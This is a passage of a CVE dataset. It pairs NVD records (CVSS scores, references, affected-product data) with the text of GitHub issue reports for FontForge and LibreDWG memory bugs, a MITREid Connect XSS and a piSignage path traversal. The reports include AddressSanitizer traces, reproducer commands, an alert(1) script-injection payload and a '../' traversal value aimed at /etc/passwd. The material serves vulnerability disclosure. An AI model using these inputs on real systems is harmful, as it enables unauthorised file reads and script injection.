fd fd fa fa fa fd fd =>0x0c0680011000: fd fd fa fa 00 00 00 fa fa fa fd fd fd[fd]fa fa 0x0c0680011010: 00 00 00 fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0680011020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0680011030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0680011040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0680011050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==7418==ABORTING ```
Use-after-free (heap) in the SFD_GetFontMetaData() function
https://api.github.com/repos/fontforge/fontforge/issues/4084/comments
9
2020-01-03T16:46:57Z
2020-01-06T11:35:56Z
https://github.com/fontforge/fontforge/issues/4084
545,070,041
4,084
980
CVE-2020-5496
2020-01-03T22:15:13.333
FontForge 20190801 has a heap-based buffer overflow in the Type2NotDefSplines() function in splinesave.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00041.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/fontforge/fontforge/issues/4085" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/03/msg00007.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202004-14" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00041.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/fontforge/fontforge/issues/4085" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/03/msg00007.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202004-14" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fontforge:fontforge:20190801:*:*:*:*:*:*:*", "matchCriteriaId": "B87AF8DA-5CBE-4497-A0EF-779E168C2381", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/fontforge/fontforge/issues/4085
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "fontforge", "fontforge" ]
Hi, While fuzzing FontForge with AFL, I found a heap-based buffer overflow in the Type2NotDefSplines() function, in splinesave.c. Attaching a reproducer (gzipped so GitHub accepts it): [test02.sfd.gz](https://github.com/fontforge/fontforge/files/4020930/test02.sfd.gz) Issue can be reproduced in FontForge 20190801 and with latest Git master by running: ``` fontforge -lang ff -c 'Open("test02.sfd"); Generate("test02.otf")' ``` ``` ================================================================= ==8320==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000013e8 at pc 0x7fe41192f7bf bp 0x7ffcc7907050 sp 0x7ffcc7907040 WRITE of size 8 at 0x6020000013e8 thread T0 #0 0x7fe41192f7be in Type2NotDefSplines /home/fcambus/fontforge-20190801/fontforge/splinesave.c:3099 #1 0x7fe41193030c in SplineFont2ChrsSubrs2 /home/fcambus/fontforge-20190801/fontforge/splinesave.c:3235 #2 0x7fe411ae5df3 in dumptype2glyphs /home/fcambus/fontforge-20190801/fontforge/tottf.c:2639 #3 0x7fe411b0f07c in initTables /home/fcambus/fontforge-20190801/fontforge/tottf.c:5750 #4 0x7fe411b13475 in _WriteTTFFont /home/fcambus/fontforge-20190801/fontforge/tottf.c:6143 #5 0x7fe411b13611 in WriteTTFFont /home/fcambus/fontforge-20190801/fontforge/tottf.c:6171 #6 0x7fe4116c60b4 in _DoSave /home/fcambus/fontforge-20190801/fontforge/savefont.c:845 #7 0x7fe4116c8f7b in GenerateScript /home/fcambus/fontforge-20190801/fontforge/savefont.c:1269 #8 0x7fe4116df9c4 in bGenerate /home/fcambus/fontforge-20190801/fontforge/scripting.c:2061 #9 0x7fe41173d6bb in docall /home/fcambus/fontforge-20190801/fontforge/scripting.c:9632 #10 0x7fe41173e55e in handlename /home/fcambus/fontforge-20190801/fontforge/scripting.c:9745 #11 0x7fe4117428d0 in term /home/fcambus/fontforge-20190801/fontforge/scripting.c:9983 #12 0x7fe4117441de in mul /home/fcambus/fontforge-20190801/fontforge/scripting.c:10128 #13 0x7fe411744ade in add /home/fcambus/fontforge-20190801/fontforge/scripting.c:10174 #14 0x7fe4117459e7 in comp /home/fcambus/fontforge-20190801/fontforge/scripting.c:10249 #15 0x7fe41174644d in _and /home/fcambus/fontforge-20190801/fontforge/scripting.c:10293 #16 0x7fe411746a79 in _or /home/fcambus/fontforge-20190801/fontforge/scripting.c:10325 #17 0x7fe411747167 in assign /home/fcambus/fontforge-20190801/fontforge/scripting.c:10358 #18 0x7fe41174884f in expr /home/fcambus/fontforge-20190801/fontforge/scripting.c:10436 #19 0x7fe41174a4de in ff_statement /home/fcambus/fontforge-20190801/fontforge/scripting.c:10649 #20 0x7fe41174bb92 in ProcessNativeScript /home/fcambus/fontforge-20190801/fontforge/scripting.c:10796 #21 0x7fe41174c59f in _CheckIsScript /home/fcambus/fontforge-20190801/fontforge/scripting.c:10894 #22 0x7fe41174c881 in CheckIsScript /home/fcambus/fontforge-20190801/fontforge/scripting.c:10927 #23 0x7fe413289be7 in fontforge_main /home/fcambus/fontforge-20190801/fontforgeexe/startui.c:1099 #24 0x55d5019f01ec in main /home/fcambus/fontforge-20190801/fontforgeexe/main.c:33 #25 0x7fe4129171e2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x271e2) #26 0x55d5019f010d in _start (/home/fcambus/fontforge-20190801/fontforgeexe/.libs/fontforge+0x110d) Address 0x6020000013e8 is a wild pointer. SUMMARY: AddressSanitizer: heap-buffer-overflow /home/fcambus/fontforge-20190801/fontforge/splinesave.c:3099 in Type2NotDefSplines Shadow bytes around the buggy address: 0x0c047fff8220: fa fa 05 fa fa fa 00 02 fa fa fd fa fa fa 00 00 0x0c047fff8230: fa fa 00 01 fa fa 07 fa fa fa 01 fa fa fa 01 fa 0x0c047fff8240: fa fa 01 fa fa fa 00 03 fa fa 00 03 fa fa 00 03 0x0c047fff8250: fa fa 00 04 fa fa 04 fa fa fa 01 fa fa fa fa fa 0x0c047fff8260: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c047fff8270: fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa 0x0c047fff8280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8290: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff82a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff82b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff82c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==8320==ABORTING ```
Heap-based buffer overflow in the Type2NotDefSplines() function
https://api.github.com/repos/fontforge/fontforge/issues/4085/comments
5
2020-01-03T21:15:18Z
2020-01-07T13:16:27Z
https://github.com/fontforge/fontforge/issues/4085
545,166,682
4,085
981
CVE-2020-5497
2020-01-04T03:15:10.630
The OpenID Connect reference implementation for MITREid Connect through 1.3.3 allows XSS due to userInfoJson being included in the page unsanitized. This is related to header.tag. The issue can be exploited to execute arbitrary JavaScript.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/156574/MITREid-1.3.3-Cross-Site-Scripting.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://seclists.org/fulldisclosure/2020/Feb/25" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mitreid-connect/OpenID-Connect-Java-Spring-Server/issues/1521" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.securitymetrics.com/blog/MITREid-Connect-cross-site-scripting-CVE-2020-5497" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/156574/MITREid-1.3.3-Cross-Site-Scripting.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://seclists.org/fulldisclosure/2020/Feb/25" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mitreid-connect/OpenID-Connect-Java-Spring-Server/issues/1521" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.securitymetrics.com/blog/MITREid-Connect-cross-site-scripting-CVE-2020-5497" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mitreid:connect:*:*:*:*:*:*:*:*", "matchCriteriaId": "FC637AA4-26EF-4FB8-8608-6B658EBEDFF9", "versionEndExcluding": null, "versionEndIncluding": "1.3.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/mitreid-connect/OpenID-Connect-Java-Spring-Server/issues/1521
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "mitreid-connect", "OpenID-Connect-Java-Spring-Server" ]
`header.tag` appears to be vulnerable to XSS here: ~~~ // get the info of the current user, if available (null otherwise) function getUserInfo() { return ${userInfoJson}; } ~~~ **userInfoJson** is included in the page and is not encoded so malicious elements could be created. If the string `</script>` appears in **userInfoJson**, the `<script>` element will be closed and a new malicious `<script>` can be created: ~~~ // get the info of the current user, if available (null otherwise) function getUserInfo() { return {"sub":"12318767","name":"Test</script><script>alert(1)</script> Test","preferred_username":"Test","given_name":"Test</script><script>alert(1)</script>","family_name":"Test","email":"test@test.com","email_verified":true}; } ~~~ ![openid_xss2](https://user-images.githubusercontent.com/161021/71742090-d6bf1e00-2e1d-11ea-9a09-6b29f4e5c08a.png) And the malicious JavaScript is executed: ![openid_xss](https://user-images.githubusercontent.com/161021/71741488-4502e100-2e1c-11ea-99bf-1809d27c1830.png)
Cross-Site Scripting header.tag
https://api.github.com/repos/mitreid-connect/OpenID-Connect-Java-Spring-Server/issues/1521/comments
10
2020-01-03T18:59:15Z
2020-11-30T09:31:20Z
https://github.com/mitreid-connect/OpenID-Connect-Java-Spring-Server/issues/1521
545,116,200
1,521
982
CVE-2019-20354
2020-01-06T06:15:10.970
The web application component of piSignage before 2.6.4 allows a remote attacker (authenticated as a low-privilege user) to download arbitrary files from the Raspberry Pi via api/settings/log?file=../ path traversal. In other words, this issue is in the player API for log download.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/155864/piSignage-2.6.4-Directory-Traversal.html" }, { "source": "cve@mitre.org", "tags": [ "Release Notes" ], "url": "https://github.com/colloqi/piSignage/blob/master/RELEASE%20NOTES.md" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/colloqi/piSignage/issues/97" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/155864/piSignage-2.6.4-Directory-Traversal.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes" ], "url": "https://github.com/colloqi/piSignage/blob/master/RELEASE%20NOTES.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/colloqi/piSignage/issues/97" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pisignage:pisignage:*:*:*:*:*:*:*:*", "matchCriteriaId": "685B46F6-D976-4C06-A7D8-58CD6806D11A", "versionEndExcluding": "2.6.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/colloqi/piSignage/issues/97
[ "Exploit", "Third Party Advisory" ]
github.com
[ "colloqi", "piSignage" ]
# Describe the bug ### Suggested description of the vulnerability : A path traversal vulnerability in the web application component of piSignage 2.6 allows a remote attacker authenticated as a low privilege user to download arbitrary files from the Raspberry Pi. ### Attack vector(s) ![66](https://user-images.githubusercontent.com/40930382/68727275-4592ae80-0607-11ea-8f15-7df1a1b2cc3d.png)  1. Click the Log Download button at the bottom of the 'piSignage' administration page. ![67](https://user-images.githubusercontent.com/40930382/68726719-bb961600-0605-11ea-818b-60900ffd6e65.png)  2. HTTP Packet is sent when the button is pressed. ![68](https://user-images.githubusercontent.com/40930382/68726808-fbf59400-0605-11ea-826a-34a427f05cc3.png)  3. Change the value of 'file' parameter to `../../../../../../../../../../etc/passwd`. ![69](https://user-images.githubusercontent.com/40930382/68726876-26dfe800-0606-11ea-98d7-f7f7d84ef6b2.png)  4. You can see that the /etc/passwd file is read. ### Affected URL/API(s) URL: `/api/settings/log` Parameter: `file` ### Environment * Raspberry Pi Hardware Version: Model 3B+ Revision: 1.3 Ram: 1 GB Sony UK * piSignage Version: pisignage_2.6.1.img
Path Traversal vulnerability
https://api.github.com/repos/colloqi/piSignage/issues/97/comments
4
2019-11-13T02:19:31Z
2020-01-05T00:38:13Z
https://github.com/colloqi/piSignage/issues/97
521,915,514
97
983
CVE-2020-6609
2020-01-08T21:15:11.193
GNU LibreDWG 0.9.3.2564 has a heap-based buffer over-read in read_pages_map in decode_r2007.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00046.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00052.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/179#issue-544834443" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00046.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00052.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/179#issue-544834443" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.9.3.2564:*:*:*:*:*:*:*", "matchCriteriaId": "6292F71C-4D80-4570-A07D-C790FEEE9B2B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/LibreDWG/libredwg/issues/179#issue-544834443
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2svg2 $PoC **1.heap-buffer-overflow in read_pages_map ../../src/decode_r2007.c:1007** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_0.9.3.2564/id:000239%2Csig:06%2Csrc:007083%2Cop:havoc%2Crep:4 ASAN says: ``` ==4335==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000000258 at pc 0x55f9e1e04e05 bp 0x7ffc92f94a40 sp 0x7ffc92f94a30 READ of size 8 at 0x611000000258 thread T0 #0 0x55f9e1e04e04 in read_pages_map ../../src/decode_r2007.c:1007 #1 0x55f9e1e04e04 in read_r2007_meta_data ../../src/decode_r2007.c:1774 #2 0x55f9e1dd66d7 in decode_R2007 ../../src/decode.c:2973 #3 0x55f9e1dd66d7 in dwg_decode ../../src/decode.c:241 #4 0x55f9e177b466 in dwg_read_file ../../src/dwg.c:210 #5 0x55f9e1776d4b in test_SVG ../../examples/dwg2svg2.c:116 #6 0x55f9e1776d4b in main ../../examples/dwg2svg2.c:501 #7 0x7f595f806b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x55f9e17779a9 in _start (/home/user/linhlhq/libredwg/asan_build/examples/dwg2svg2+0x2d59a9) 0x61100000025c is located 0 bytes to the right of 220-byte region [0x611000000180,0x61100000025c) allocated by thread T0 here: #0 0x7f5960052d38 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded38) #1 0x55f9e1de73be in read_system_page ../../src/decode_r2007.c:635 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../src/decode_r2007.c:1007 in read_pages_map Shadow bytes around the buggy address: 0x0c227fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c227fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8020: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fa 0x0c227fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c227fff8040: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa 0x0c227fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==4335==ABORTING ```
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/179/comments
7
2020-01-03T03:19:25Z
2020-01-16T12:12:04Z
https://github.com/LibreDWG/libredwg/issues/179
544,834,443
179
984
CVE-2020-6610
2020-01-08T21:15:11.287
GNU LibreDWG 0.9.3.2564 has an attempted excessive memory allocation in read_sections_map in decode_r2007.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00046.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00052.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447120" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00046.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00052.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447120" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.9.3.2564:*:*:*:*:*:*:*", "matchCriteriaId": "6292F71C-4D80-4570-A07D-C790FEEE9B2B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:backports:sle-15:sp1:*:*:*:*:*:*", "matchCriteriaId": "C84D9410-31B7-421A-AD99-8ED2E45A9BC6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447120
[ "Exploit", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
